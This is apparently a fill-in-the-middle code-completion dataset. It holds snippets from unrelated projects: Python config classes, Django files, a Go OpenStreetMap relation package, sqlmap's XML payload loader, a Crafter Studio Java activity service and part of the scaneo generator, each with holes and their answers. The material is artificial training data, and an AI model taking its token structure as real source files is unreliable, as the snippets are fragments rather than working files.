def pop(self, key, default=None):
value = self._collection.pop(key, default)
if isinstance(value, Proxy):
value = value.get()
return value
class ConfigList(BaseConfig):
def __init__(self, config_l, path=None, resolver=None):
super().__init__(path=path, resolver=resolver)
self._collection = []
for key, value in enumerate(config_l):
self._collection.append(self._from_python(str(key), value))
def __getitem__(self, key):
value = self._collection[key]
if isinstance(key, slice):
slice_repr = ":".join(str("" if i is None else i) for i in (key.start, key.stop, key.step))
logger.debug("Get /%s[%s] config key", "/".join(self._path), slice_repr)
return [self._to_python(item) for item in value]
else:
logger.debug("Get /%s[%s] config key", "/".join(self._path), key)
return self._to_python(value)
def __iter__(self):
for element in self._collection:
yield self._to_python(element)
def serialize(self):
s = []
for v in self:
if isinstance(v, BaseConfig):
v = v.serialize()
s.append(v)
return s
class ConfigDict(BaseConfig):
def __init__(self, config_d, path=None, resolver=None):
super().__init__(path=path, resolver=resolver)
self._collection = {}
for key, value in config_d.items():
self._collection[key] = self._from_python(key, value)
def __getitem__(self, key):
logger.debug("Get /%s config key", "/".join(self._path + (key,)))
value = self._collection[key]
return self._to_python(value)
def get(self, key, default=None):
try:
value = self[key]
except KeyError:
value = self._to_python(default)
return value
def __iter__(self):
yield from self._collection
def keys(self):
return self._collection.keys()
def values(self):
for value in self._collection.values():
yield self._to_python(value)
def items(self):
for key, value in self._collection.items():
yield key, self._to_python(value)
def clear(self):
return self._collection.clear()
def setdefault(self, key, default=None):
return self._collection.setdefault(key, self._from_python(key, default))
def pop(self, key, default=None):
value = self._collection.pop(key, default)
return self._to_python(value)
def popitem(self):
key, value = self._collection.popitem()
return key, self._to_python(value)
def copy(self):
return ConfigDict(self._collection.copy(), path=self._path, resolver=self._resolver)
def update(self, *args, **kwargs):
chain = []
for arg in args:
if isinstance(arg, dict):
iterator = arg.items()
else:
iterator = arg
chain = itertools.chain(chain, iterator)
if kwargs:
chain = itertools.chain(chain, kwargs.items())
for key, value in iterator:
self._collection[key] = self._from_python(key, value)
def serialize(self):
s = {}
for k, v in self.items():
if isinstance(v, BaseConfig):<|fim▁hole|><|fim▁end|>
|
v = v.serialize()
s[k] = v
return s
|
<|file_name|>manage.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "RandomPasswordGenerator.settings")
try:
from django.core.management import execute_from_command_line
<|fim▁hole|> # The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)<|fim▁end|>
|
except ImportError:
|
<|file_name|>relation.go<|end_file_name|><|fim▁begin|>package relation
import (
// "fmt"
"github.com/vetinari/osm/bbox"
"github.com/vetinari/osm/item"
"github.com/vetinari/osm/node"
"github.com/vetinari/osm/tags"
"github.com/vetinari/osm/user"
"github.com/vetinari/osm/way"
"time"
)
func (self *Relation) Type() item.ItemType { return item.TypeRelation }
func (self *Relation) Id() int64 { return self.Id_ }
func (self *Relation) Members() []*Member { return self.Members_ }
func (self *Relation) User() *user.User { return self.User_ }
func (self *Relation) Tags() *tags.Tags { return self.Tags_ }
func (self *Relation) Timestamp() time.Time { return self.Timestamp_ }
func (self *Relation) Version() int64 { return self.Version_ }
func (self *Relation) Changeset() int64 { return self.Changeset_ }
func (self *Relation) Visible() bool { return self.Visible_ }
var newRelationNum int64 = 0
func newRelationId() int64 {
newRelationNum -= 1
return newRelationNum
}
type Member struct {
Type_ item.ItemType
Role string
Ref item.Item
Id_ int64
}
type Relation struct {
Id_ int64
Members_ []*Member
User_ *user.User
Tags_ *tags.Tags
Timestamp_ time.Time
Version_ int64
Changeset_ int64
Visible_ bool
modified bool
deleted bool
}
type RelationList []*Relation
func NewRelation(m *Member) *Relation {
return &Relation{
Members_: []*Member{m},
Id_: newRelationId(),
Tags_: tags.New(),
Timestamp_: time.Now(),
Version_: 0,
Changeset_: 0,
Visible_: true,
User_: &user.User{Id: 0, Name: ""},
modified: true,
deleted: false,
}
}
func (m *Member) Type() item.ItemType {
return m.Type_
}
func (m *Member) Id() int64 {
return m.Id_
}
func NewMember(role string, i item.Item) *Member {
switch i.Type() {
case item.TypeNode:
return &Member{Type_: i.Type(), Role: role, Ref: i, Id_: i.(*node.Node).Id()}
case item.TypeWay:
return &Member{Type_: i.Type(), Role: role, Ref: i, Id_: i.(*way.Way).Id()}
case item.TypeRelation:
return &Member{Type_: i.Type(), Role: role, Ref: i, Id_: i.(*Relation).Id()}
default:
panic("invalid member type")
}
}
func (r *Relation) GetMembers() []*Member {
return r.Members_
}
func (r *Relation) AddMember(i item.Item, role string) {
r.Members_ = append(r.Members_, NewMember(role, i))
}<|fim▁hole|>func (r *Relation) GetNodes() []*node.Node {
var n []*node.Node
for _, m := range r.GetMembers() {
switch (m.Ref).(type) {
case *node.Node:
n = append(n, (m.Ref).(*node.Node))
case *way.Way:
n = append(n, (m.Ref).(*way.Way).GetNodes()...)
case *Relation:
n = append(n, (m.Ref).(*Relation).GetNodes()...)
}
}
return n
}
func (r *Relation) GetWays() []*way.Way {
var w []*way.Way
for _, m := range r.GetMembers() {
switch (m.Ref).(type) {
case *way.Way:
w = append(w, (m.Ref).(*way.Way))
case *Relation:
w = append(w, (m.Ref).(*Relation).GetWays()...)
default:
continue
}
}
return w
}
func (r *Relation) BoundingBox() (*bbox.BBox, error) {
return node.NodeList(r.GetNodes()).BoundingBox()
}
// Recursively collects all members of type "way"
func (r *Relation) WayMembers() []*Member {
var wm []*Member
for _, m := range r.GetMembers() {
switch (m.Ref).(type) {
case *way.Way:
wm = append(wm, m)
case *Relation:
wm = append(wm, (m.Ref).(*Relation).WayMembers()...)
default:
continue
}
}
return wm
}
func (r *Relation) IsMultipolygon() bool {
if r.Tags == nil {
return false
}
t := map[string]string(*r.Tags_)
return t["type"] == "multipolygon"
}
func (r *Relation) IsAreaRelation() bool {
if r.Tags == nil {
return false
}
switch r.Tags_.Get("type") {
case "multipolygon", "boundary":
return true
default:
return false
}
return false
}
// If a way in the r.WayMembers() output is connected to the next one in
// the list (and they must have the same role) they're joined, otherwise
// a new way is started.
//
// For area relations like "type=multipolygon" or "type=boundary" you can
// check if the member ways build a closed ring (or multiple rings) by
// running Cosed() for each way returned by this func.
func (r *Relation) WayMembersAsWays() ([]*way.Way, error) {
var ways []*way.Way
var err error
all := r.WayMembers()
if len(all) == 0 {
return way.EmptyWays(), nil
}
if len(all) == 1 {
// in doubt we get an empty list back
n, err := way.New(all[0].Ref.(*way.Way).Nodes())
if err != nil {
return way.EmptyWays(), err
}
return []*way.Way{n}, nil
}
cur, all := all[0], all[1:]
// prev := cur
role := cur.Role
cur_w, err := way.New(cur.Ref.(*way.Way).Nodes())
if err != nil {
return way.EmptyWays(), err
}
for _, wr := range all {
if wr.Role != role {
ways = append(ways, cur_w)
cur_w, err = way.New(wr.Ref.(*way.Way).Nodes())
if err != nil {
return way.EmptyWays(), err
}
role = wr.Role
// prev = wr
continue
}
conn := cur_w.Connected(wr.Ref.(*way.Way))
// fmt.Printf("Connected: #%d - #%d => %s\n", prev.Ref.(*way.Way).Id(), wr.Ref.(*way.Way).Id(), conn)
var conn_way *way.Way
switch conn {
case way.NotConnected:
ways = append(ways, cur_w)
cur_w, err = way.New(wr.Ref.(*way.Way).Nodes())
if err != nil {
return way.EmptyWays(), err
}
role = wr.Role
// prev = wr
continue
case way.ConnectedNormal:
conn_way = wr.Ref.(*way.Way)
case way.ConnectedReversed1st:
cur_w.Reverse()
conn_way, err = way.New(wr.Ref.(*way.Way).Nodes())
if err != nil {
return way.EmptyWays(), err
}
case way.ConnectedReversed2nd:
conn_way, err = way.New(wr.Ref.(*way.Way).Nodes())
if err != nil {
return way.EmptyWays(), err
}
conn_way.Reverse()
case way.ConnectedReversedBoth:
cur_w.Reverse()
conn_way, err = way.New(wr.Ref.(*way.Way).Nodes())
if err != nil {
return way.EmptyWays(), err
}
conn_way.Reverse()
}
_ = cur_w.Join(conn_way) // we already checked they're connected
// prev = wr
}
return append(ways, cur_w), nil
}
// vim: ts=4 sw=4 noexpandtab nolist syn=go<|fim▁end|>
| |
<|file_name|>0005_auto_20150412_1806.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
<|fim▁hole|>class Migration(migrations.Migration):
dependencies = [
('hhlregistrations', '0004_auto_20150411_1935'),
]
operations = [
migrations.AddField(
model_name='event',
name='payment_due',
field=models.DateTimeField(null=True, blank=True),
),
migrations.AddField(
model_name='event',
name='require_registration',
field=models.BooleanField(default=False),
),
]<|fim▁end|>
| |
<|file_name|>payloads.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
"""
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import os
from xml.etree import ElementTree as et
from lib.core.data import conf
from lib.core.data import logger
from lib.core.data import paths
from lib.core.datatype import AttribDict
from lib.core.exception import SqlmapInstallationException
def cleanupVals(text, tag):
if tag in ("clause", "where"):
text = text.split(',')
if isinstance(text, basestring):
text = int(text) if text.isdigit() else str(text)
elif isinstance(text, list):
count = 0
for _ in text:
text[count] = int(_) if _.isdigit() else str(_)
count += 1
if len(text) == 1 and tag not in ("clause", "where"):
text = text[0]
return text
def parseXmlNode(node):
for element in node.getiterator('boundary'):
boundary = AttribDict()
<|fim▁hole|> if child.text:
values = cleanupVals(child.text, child.tag)
boundary[child.tag] = values
else:
boundary[child.tag] = None
conf.boundaries.append(boundary)
for element in node.getiterator('test'):
test = AttribDict()
for child in element.getchildren():
if child.text and child.text.strip():
values = cleanupVals(child.text, child.tag)
test[child.tag] = values
else:
if len(child.getchildren()) == 0:
test[child.tag] = None
continue
else:
test[child.tag] = AttribDict()
for gchild in child.getchildren():
if gchild.tag in test[child.tag]:
prevtext = test[child.tag][gchild.tag]
test[child.tag][gchild.tag] = [prevtext, gchild.text]
else:
test[child.tag][gchild.tag] = gchild.text
conf.tests.append(test)
def loadBoundaries():
try:
doc = et.parse(paths.BOUNDARIES_XML)
except Exception, ex:
errMsg = "something seems to be wrong with "
errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, ex)
errMsg += "sure that you haven't made any changes to it"
raise SqlmapInstallationException, errMsg
root = doc.getroot()
parseXmlNode(root)
def loadPayloads():
payloadFiles = os.listdir(paths.SQLMAP_XML_PAYLOADS_PATH)
payloadFiles.sort()
for payloadFile in payloadFiles:
payloadFilePath = os.path.join(paths.SQLMAP_XML_PAYLOADS_PATH, payloadFile)
#logger.debug("Parsing payloads from file '%s'" % payloadFile)
try:
doc = et.parse(payloadFilePath)
except Exception, ex:
errMsg = "something seems to be wrong with "
errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, ex)
errMsg += "sure that you haven't made any changes to it"
raise SqlmapInstallationException, errMsg
root = doc.getroot()
parseXmlNode(root)<|fim▁end|>
|
for child in element.getchildren():
|
<|file_name|>ActivityServiceImpl.java<|end_file_name|><|fim▁begin|>/*
* Crafter Studio Web-content authoring solution
* Copyright (C) 2007-2016 Crafter Software Corporation.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package org.craftercms.studio.impl.v1.service.activity;
import java.time.ZoneOffset;
import java.time.ZonedDateTime;
import java.util.*;
import net.sf.json.JSONObject;
import org.apache.commons.collections.CollectionUtils;
import org.apache.commons.lang3.StringUtils;
import org.craftercms.commons.validation.annotations.param.ValidateIntegerParam;
import org.craftercms.commons.validation.annotations.param.ValidateParams;
import org.craftercms.commons.validation.annotations.param.ValidateSecurePathParam;
import org.craftercms.commons.validation.annotations.param.ValidateStringParam;
import org.craftercms.studio.api.v1.constant.StudioConstants;
import org.craftercms.studio.api.v1.constant.DmConstants;
import org.craftercms.studio.api.v1.dal.AuditFeed;
import org.craftercms.studio.api.v1.dal.AuditFeedMapper;
import org.craftercms.studio.api.v1.exception.ServiceException;
import org.craftercms.studio.api.v1.exception.SiteNotFoundException;
import org.craftercms.studio.api.v1.log.Logger;
import org.craftercms.studio.api.v1.log.LoggerFactory;
import org.craftercms.studio.api.v1.service.AbstractRegistrableService;
import org.craftercms.studio.api.v1.service.activity.ActivityService;
import org.craftercms.studio.api.v1.service.content.ContentService;
import org.craftercms.studio.api.v1.service.deployment.DeploymentService;
import org.craftercms.studio.api.v1.service.objectstate.State;
import org.craftercms.studio.api.v1.service.site.SiteService;
import org.craftercms.studio.api.v1.to.ContentItemTO;
import org.craftercms.studio.api.v1.util.DebugUtils;
import org.craftercms.studio.api.v1.util.StudioConfiguration;
import org.springframework.beans.factory.annotation.Autowired;
import org.craftercms.studio.api.v1.service.security.SecurityService;
import static org.craftercms.studio.api.v1.constant.StudioConstants.CONTENT_TYPE_PAGE;
import static org.craftercms.studio.api.v1.util.StudioConfiguration.ACTIVITY_USERNAME_CASE_SENSITIVE;
public class ActivityServiceImpl extends AbstractRegistrableService implements ActivityService {
private static final Logger logger = LoggerFactory.getLogger(ActivityServiceImpl.class);
protected static final int MAX_LEN_USER_ID = 255; // needs to match schema:
// feed_user_id,
// post_user_id
protected static final int MAX_LEN_SITE_ID = 255; // needs to match schema:
// site_network
protected static final int MAX_LEN_ACTIVITY_TYPE = 255; // needs to match
// schema:
// activity_type
protected static final int MAX_LEN_ACTIVITY_DATA = 4000; // needs to match
// schema:
// activity_data
protected static final int MAX_LEN_APP_TOOL_ID = 36; // needs to match
// schema: app_tool
/** activity post properties **/
protected static final String ACTIVITY_PROP_ACTIVITY_SUMMARY = "activitySummary";
protected static final String ACTIVITY_PROP_ID = "id";
protected static final String ACTIVITY_PROP_POST_DATE = "postDate";
protected static final String ACTIVITY_PROP_USER = "user";
protected static final String ACTIVITY_PROP_FEEDUSER = "feedUserId";
protected static final String ACTIVITY_PROP_CONTENTID = "contentId";
/** activity feed format **/
protected static final String ACTIVITY_FEED_FORMAT = "json";
@Autowired
protected AuditFeedMapper auditFeedMapper;
protected SiteService siteService;
protected ContentService contentService;
protected SecurityService securityService;
protected StudioConfiguration studioConfiguration;
protected DeploymentService deploymentService;
@Override
public void register() {
getServicesManager().registerService(ActivityService.class, this);
}
@Override
@ValidateParams
public void postActivity(@ValidateStringParam(name = "site") String site, @ValidateStringParam(name = "user") String user, @ValidateSecurePathParam(name = "contentId") String contentId, ActivityType activity, ActivitySource source, Map<String,String> extraInfo) {
JSONObject activityPost = new JSONObject();
activityPost.put(ACTIVITY_PROP_USER, user);
activityPost.put(ACTIVITY_PROP_ID, contentId);
if (extraInfo != null) {
activityPost.putAll(extraInfo);
}
String contentType = null;
if (extraInfo != null) {
contentType = extraInfo.get(DmConstants.KEY_CONTENT_TYPE);
}
postActivity(activity.toString(), source.toString(), site, null, activityPost.toString(),contentId,contentType, user);
}
private void postActivity(String activityType, String activitySource, String siteNetwork, String appTool, String activityData,
String contentId, String contentType, String approver) {
String currentUser = (StringUtils.isEmpty(approver)) ? securityService.getCurrentUser() : approver;
try {
// optional - default to empty string
if (siteNetwork == null) {
siteNetwork = "";
} else if (siteNetwork.length() > MAX_LEN_SITE_ID) {
throw new ServiceException("Invalid site network - exceeds " + MAX_LEN_SITE_ID + " chars: "
+ siteNetwork);
}
// optional - default to empty string
if (appTool == null) {
appTool = "";
} else if (appTool.length() > MAX_LEN_APP_TOOL_ID) {
throw new ServiceException("Invalid app tool - exceeds " + MAX_LEN_APP_TOOL_ID + " chars: " + appTool);
}
// required
if (StringUtils.isEmpty(activityType)) {
throw new ServiceException("Invalid activity type - activity type is empty");
} else if (activityType.length() > MAX_LEN_ACTIVITY_TYPE) {
throw new ServiceException("Invalid activity type - exceeds " + MAX_LEN_ACTIVITY_TYPE + " chars: "
+ activityType);
}
// optional - default to empty string
if (activityData == null) {
activityData = "";
} else if (activityType.length() > MAX_LEN_ACTIVITY_DATA) {
throw new ServiceException("Invalid activity data - exceeds " + MAX_LEN_ACTIVITY_DATA + " chars: "
+ activityData);
}
// required
if (StringUtils.isEmpty(currentUser)) {
throw new ServiceException("Invalid user - user is empty");
} else if (currentUser.length() > MAX_LEN_USER_ID) {
throw new ServiceException("Invalid user - exceeds " + MAX_LEN_USER_ID + " chars: " + currentUser);
} else {
// user names are not case-sensitive
currentUser = currentUser.toLowerCase();
}
if (contentType == null) {
contentType = CONTENT_TYPE_PAGE;
}
} catch (ServiceException e) {
// log error and throw exception
logger.error("Error in getting feeds", e);
}
try {
ZonedDateTime postDate = ZonedDateTime.now(ZoneOffset.UTC);
AuditFeed activityPost = new AuditFeed();
activityPost.setUserId(currentUser);
activityPost.setSiteNetwork(siteNetwork);
activityPost.setSummary(activityData);
activityPost.setType(activityType);
activityPost.setCreationDate(postDate);
activityPost.setModifiedDate(postDate);
activityPost.setSummaryFormat("json");
activityPost.setContentId(contentId);
activityPost.setContentType(contentType);
activityPost.setSource(activitySource);
try {
activityPost.setCreationDate(ZonedDateTime.now(ZoneOffset.UTC));
long postId = insertFeedEntry(activityPost);
activityPost.setId(postId);
logger.debug("Posted: " + activityPost);
} catch (Exception e) {
throw new ServiceException("Failed to post activity: " + e, e);
}
}
catch (ServiceException e) {
// log error, subsume exception (for post activity)
logger.error("Error in posting feed", e);
}
}
private long insertFeedEntry(AuditFeed activityFeed) {
DebugUtils.addDebugStack(logger);
logger.debug("Insert activity " + activityFeed.getContentId());
Long id = auditFeedMapper.insertActivityFeed(activityFeed);
return (id != null ? id : -1);
}
@Override
@ValidateParams
public void renameContentId(@ValidateStringParam(name = "site") String site, @ValidateSecurePathParam(name = "oldUrl") String oldUrl, @ValidateSecurePathParam(name = "newUrl") String newUrl) {
DebugUtils.addDebugStack(logger);
logger.debug("Rename " + oldUrl + " to " + newUrl);
Map<String, String> params = new HashMap<String, String>();
params.put("newPath", newUrl);
params.put("site", site);
params.put("oldPath", oldUrl);
auditFeedMapper.renameContent(params);
}
@Override
@ValidateParams
public List<ContentItemTO> getActivities(@ValidateStringParam(name = "site") String site, @ValidateStringParam(name = "user") String user, @ValidateIntegerParam(name = "num") int num, @ValidateStringParam(name = "sort") String sort, boolean ascending, boolean excludeLive, @ValidateStringParam(name = "filterType") String filterType) throws ServiceException {
int startPos = 0;
List<ContentItemTO> contentItems = new ArrayList<ContentItemTO>();
boolean hasMoreItems = true;
while(contentItems.size() < num && hasMoreItems){
int remainingItems = num - contentItems.size();
hasMoreItems = getActivityFeeds(user, site, startPos, num , filterType, excludeLive,contentItems,remainingItems);
startPos = startPos+num;
}
if(contentItems.size() > num){
return contentItems.subList(0, num);
}
return contentItems;
}
/**
*
* Returns all non-live items if hideLiveItems is true, else should return all feeds back
*
*/
protected boolean getActivityFeeds(String user, String site,int startPos, int size, String filterType,boolean hideLiveItems,List<ContentItemTO> contentItems,int remainingItem){
List<String> activityFeedEntries = new ArrayList<String>();
if (!getUserNamesAreCaseSensitive()) {
user = user.toLowerCase();
}
List<AuditFeed> activityFeeds = null;
activityFeeds = selectUserFeedEntries(user, ACTIVITY_FEED_FORMAT, site, startPos, size,
filterType, hideLiveItems);
for (AuditFeed activityFeed : activityFeeds) {
activityFeedEntries.add(activityFeed.getJSONString());
}
boolean hasMoreItems=true;
//if number of items returned is less than size it means that table has no more records
if(activityFeedEntries.size()<size){
hasMoreItems=false;
}
if (activityFeedEntries != null && activityFeedEntries.size() > 0) {
for (int index = 0; index < activityFeedEntries.size() && remainingItem!=0; index++) {
JSONObject feedObject = JSONObject.fromObject(activityFeedEntries.get(index));
String id = (feedObject.containsKey(ACTIVITY_PROP_CONTENTID)) ? feedObject.getString(ACTIVITY_PROP_CONTENTID) : "";
ContentItemTO item = createActivityItem(site, feedObject, id);
item.published = true;
item.setPublished(true);
ZonedDateTime pubDate = deploymentService.getLastDeploymentDate(site, id);
item.publishedDate = pubDate;
item.setPublishedDate(pubDate);
contentItems.add(item);
remainingItem--;
}
}
logger.debug("Total Item post live filter : " + contentItems.size() + " hasMoreItems : "+hasMoreItems);
return hasMoreItems;
}
/**
* create an activity from the given feed
*
* @param site
* @param feedObject
* @return activity
*/
protected ContentItemTO createActivityItem(String site, JSONObject feedObject, String id) {
try {
ContentItemTO item = contentService.getContentItem(site, id, 0);
if(item == null || item.isDeleted()) {
item = contentService.createDummyDmContentItemForDeletedNode(site, id);
String modifier = (feedObject.containsKey(ACTIVITY_PROP_FEEDUSER)) ? feedObject.getString(ACTIVITY_PROP_FEEDUSER) : "";
if(modifier != null && !modifier.isEmpty()) {
item.user = modifier;
}
String activitySummary = (feedObject.containsKey(ACTIVITY_PROP_ACTIVITY_SUMMARY)) ? feedObject.getString(ACTIVITY_PROP_ACTIVITY_SUMMARY) : "";
JSONObject summaryObject = JSONObject.fromObject(activitySummary);
if (summaryObject.containsKey(DmConstants.KEY_CONTENT_TYPE)) {
String contentType = (String)summaryObject.get(DmConstants.KEY_CONTENT_TYPE);
item.contentType = contentType;
}
if(summaryObject.containsKey(StudioConstants.INTERNAL_NAME)) {
String internalName = (String)summaryObject.get(StudioConstants.INTERNAL_NAME);
item.internalName = internalName;
}
if(summaryObject.containsKey(StudioConstants.BROWSER_URI)) {
String browserUri = (String)summaryObject.get(StudioConstants.BROWSER_URI);
item.browserUri = browserUri;
}
item.setLockOwner("");
}
String postDate = (feedObject.containsKey(ACTIVITY_PROP_POST_DATE)) ? feedObject.getString(ACTIVITY_PROP_POST_DATE) : "";
ZonedDateTime editedDate = ZonedDateTime.parse(postDate);
if (editedDate != null) {
item.eventDate = editedDate.withZoneSameInstant(ZoneOffset.UTC);
} else {
item.eventDate = editedDate;
}
return item;
} catch (Exception e) {
logger.error("Error fetching content item for [" + id + "]", e.getMessage());
return null;
}
}
private List<AuditFeed> selectUserFeedEntries(String feedUserId, String format, String siteId, int startPos, int feedSize, String contentType, boolean hideLiveItems) {<|fim▁hole|> params.put("userId",feedUserId);
params.put("summaryFormat",format);
params.put("siteNetwork",siteId);
params.put("startPos", startPos);
params.put("feedSize", feedSize);
params.put("activities", Arrays.asList(ActivityType.CREATED, ActivityType.DELETED, ActivityType.UPDATED, ActivityType.MOVED));
if(StringUtils.isNotEmpty(contentType) && !contentType.toLowerCase().equals("all")){
params.put("contentType",contentType.toLowerCase());
}
if (hideLiveItems) {
List<String> statesValues = new ArrayList<String>();
for (State state : State.LIVE_STATES) {
statesValues.add(state.name());
}
params.put("states", statesValues);
return auditFeedMapper.selectUserFeedEntriesHideLive(params);
} else {
return auditFeedMapper.selectUserFeedEntries(params);
}
}
@Override
@ValidateParams
public AuditFeed getDeletedActivity(@ValidateStringParam(name = "site") String site, @ValidateSecurePathParam(name = "path") String path) {
HashMap<String,String> params = new HashMap<String,String>();
params.put("contentId", path);
params.put("siteNetwork", site);
String activityType = ActivityType.DELETED.toString();
params.put("activityType", activityType);
return auditFeedMapper.getDeletedActivity(params);
}
@Override
@ValidateParams
public void deleteActivitiesForSite(@ValidateStringParam(name = "site") String site) {
Map<String, String> params = new HashMap<String, String>();
params.put("site", site);
auditFeedMapper.deleteActivitiesForSite(params);
}
@Override
@ValidateParams
public List<AuditFeed> getAuditLogForSite(@ValidateStringParam(name = "site") String site, @ValidateIntegerParam(name = "start") int start, @ValidateIntegerParam(name = "number") int number, @ValidateStringParam(name = "user") String user, List<String> actions)
throws SiteNotFoundException {
if (!siteService.exists(site)) {
throw new SiteNotFoundException();
} else {
Map<String, Object> params = new HashMap<String, Object>();
params.put("site", site);
params.put("start", start);
params.put("number", number);
if (StringUtils.isNotEmpty(user)) {
params.put("user", user);
}
if (CollectionUtils.isNotEmpty(actions)) {
params.put("actions", actions);
}
return auditFeedMapper.getAuditLogForSite(params);
}
}
@Override
@ValidateParams
public long getAuditLogForSiteTotal(@ValidateStringParam(name = "site") String site, @ValidateStringParam(name = "user") String user, List<String> actions)
throws SiteNotFoundException {
if (!siteService.exists(site)) {
throw new SiteNotFoundException();
} else {
Map<String, Object> params = new HashMap<String, Object>();
params.put("site", site);
if (StringUtils.isNotEmpty(user)) {
params.put("user", user);
}
if (CollectionUtils.isNotEmpty(actions)) {
params.put("actions", actions);
}
return auditFeedMapper.getAuditLogForSiteTotal(params);
}
}
public boolean getUserNamesAreCaseSensitive() {
boolean toReturn = Boolean.parseBoolean(studioConfiguration.getProperty(ACTIVITY_USERNAME_CASE_SENSITIVE));
return toReturn;
}
public SiteService getSiteService() {
return siteService;
}
public void setSiteService(final SiteService siteService) {
this.siteService = siteService;
}
public void setContentService(ContentService contentService) {
this.contentService = contentService;
}
public SecurityService getSecurityService() {return securityService; }
public void setSecurityService(SecurityService securityService) { this.securityService = securityService; }
public StudioConfiguration getStudioConfiguration() { return studioConfiguration; }
public void setStudioConfiguration(StudioConfiguration studioConfiguration) { this.studioConfiguration = studioConfiguration; }
public DeploymentService getDeploymentService() { return deploymentService; }
public void setDeploymentService(DeploymentService deploymentService) { this.deploymentService = deploymentService; }
}<|fim▁end|>
|
HashMap<String,Object> params = new HashMap<String,Object>();
|
<|file_name|>scaneo.go<|end_file_name|><|fim▁begin|>package main
import (
"errors"
"flag"
"fmt"
"go/ast"
"go/parser"
"go/token"
"log"
"os"
"path/filepath"
"strings"
"text/template"
)
const (
usageText = `SCANEO
Generate Go code to convert database rows into arbitrary structs.
USAGE
scaneo [options] paths...
OPTIONS
-o, -output
Set the name of the generated file. Default is scans.go.
-p, -package
Set the package name for the generated file. Default is current
directory name.
-u, -unexport
Generate unexported functions. Default is export all.
-w, -whitelist
Only include structs specified in case-sensitive, comma-delimited
string.
-v, -version
Print version and exit.
-h, -help
Print help and exit.
EXAMPLES
tables.go is a file that contains one or more struct declarations.
Generate scan functions based on structs in tables.go.
scaneo tables.go
Generate scan functions and name the output file funcs.go
scaneo -o funcs.go tables.go
Generate scans.go with unexported functions.
scaneo -u tables.go
Generate scans.go with only struct Post and struct user.
scaneo -w "Post,user" tables.go
NOTES
Struct field names don't have to match database column names at all.
However, the order of the types must match.
Integrate this with go generate by adding this line to the top of your
tables.go file.
//go:generate scaneo $GOFILE
`
)
type fieldToken struct {
Name string
Type string
}
type structToken struct {
Name string
Fields []fieldToken
}
func main() {
log.SetFlags(0)
<|fim▁hole|> whitelist := flag.String("w", "", "")
version := flag.Bool("v", false, "")
help := flag.Bool("h", false, "")
flag.StringVar(outFilename, "output", "scans.go", "")
flag.StringVar(packName, "package", "current directory", "")
flag.BoolVar(unexport, "unexport", false, "")
flag.StringVar(whitelist, "whitelist", "", "")
flag.BoolVar(version, "version", false, "")
flag.BoolVar(help, "help", false, "")
flag.Usage = func() { log.Println(usageText) } // call on flag error
flag.Parse()
if *help {
// not an error, send to stdout
// that way people can: scaneo -h | less
fmt.Println(usageText)
return
}
if *version {
fmt.Println("scaneo version 1.2.0")
return
}
if *packName == "current directory" {
wd, err := os.Getwd()
if err != nil {
log.Fatal("couldn't get working directory:", err)
}
*packName = filepath.Base(wd)
}
files, err := findFiles(flag.Args())
if err != nil {
log.Println("couldn't find files:", err)
log.Fatal(usageText)
}
structToks := make([]structToken, 0, 8)
for _, file := range files {
toks, err := parseCode(file, *whitelist)
if err != nil {
log.Println(`"syntax error" - parser probably`)
log.Fatal(err)
}
structToks = append(structToks, toks...)
}
if err := genFile(*outFilename, *packName, *unexport, structToks); err != nil {
log.Fatal("couldn't generate file:", err)
}
}
func findFiles(paths []string) ([]string, error) {
if len(paths) < 1 {
return nil, errors.New("no starting paths")
}
// using map to prevent duplicate file path entries
// in case the user accidently passes the same file path more than once
// probably because of autocomplete
files := make(map[string]struct{})
for _, path := range paths {
info, err := os.Stat(path)
if err != nil {
return nil, err
}
if !info.IsDir() {
// add file path to files
files[path] = struct{}{}
continue
}
filepath.Walk(path, func(fp string, fi os.FileInfo, _ error) error {
if fi.IsDir() {
// will still enter directory
return nil
} else if fi.Name()[0] == '.' {
return nil
}
// add file path to files
files[fp] = struct{}{}
return nil
})
}
deduped := make([]string, 0, len(files))
for f := range files {
deduped = append(deduped, f)
}
return deduped, nil
}
func parseCode(source string, commaList string) ([]structToken, error) {
wlist := make(map[string]struct{})
if commaList != "" {
wSplits := strings.Split(commaList, ",")
for _, s := range wSplits {
wlist[s] = struct{}{}
}
}
structToks := make([]structToken, 0, 8)
fset := token.NewFileSet()
astf, err := parser.ParseFile(fset, source, nil, 0)
if err != nil {
return nil, err
}
var filter bool
if len(wlist) > 0 {
filter = true
}
//ast.Print(fset, astf)
for _, decl := range astf.Decls {
genDecl, isGeneralDeclaration := decl.(*ast.GenDecl)
if !isGeneralDeclaration {
continue
}
for _, spec := range genDecl.Specs {
typeSpec, isTypeDeclaration := spec.(*ast.TypeSpec)
if !isTypeDeclaration {
continue
}
structType, isStructTypeDeclaration := typeSpec.Type.(*ast.StructType)
if !isStructTypeDeclaration {
continue
}
// found a struct in the source code!
var structTok structToken
// filter logic
if structName := typeSpec.Name.Name; !filter {
// no filter, collect everything
structTok.Name = structName
} else if _, exists := wlist[structName]; filter && !exists {
// if structName not in whitelist, continue
continue
} else if filter && exists {
// structName exists in whitelist
structTok.Name = structName
}
structTok.Fields = make([]fieldToken, 0, len(structType.Fields.List))
// iterate through struct fields (1 line at a time)
for _, fieldLine := range structType.Fields.List {
fieldToks := make([]fieldToken, len(fieldLine.Names))
// get field name (or names because multiple vars can be declared in 1 line)
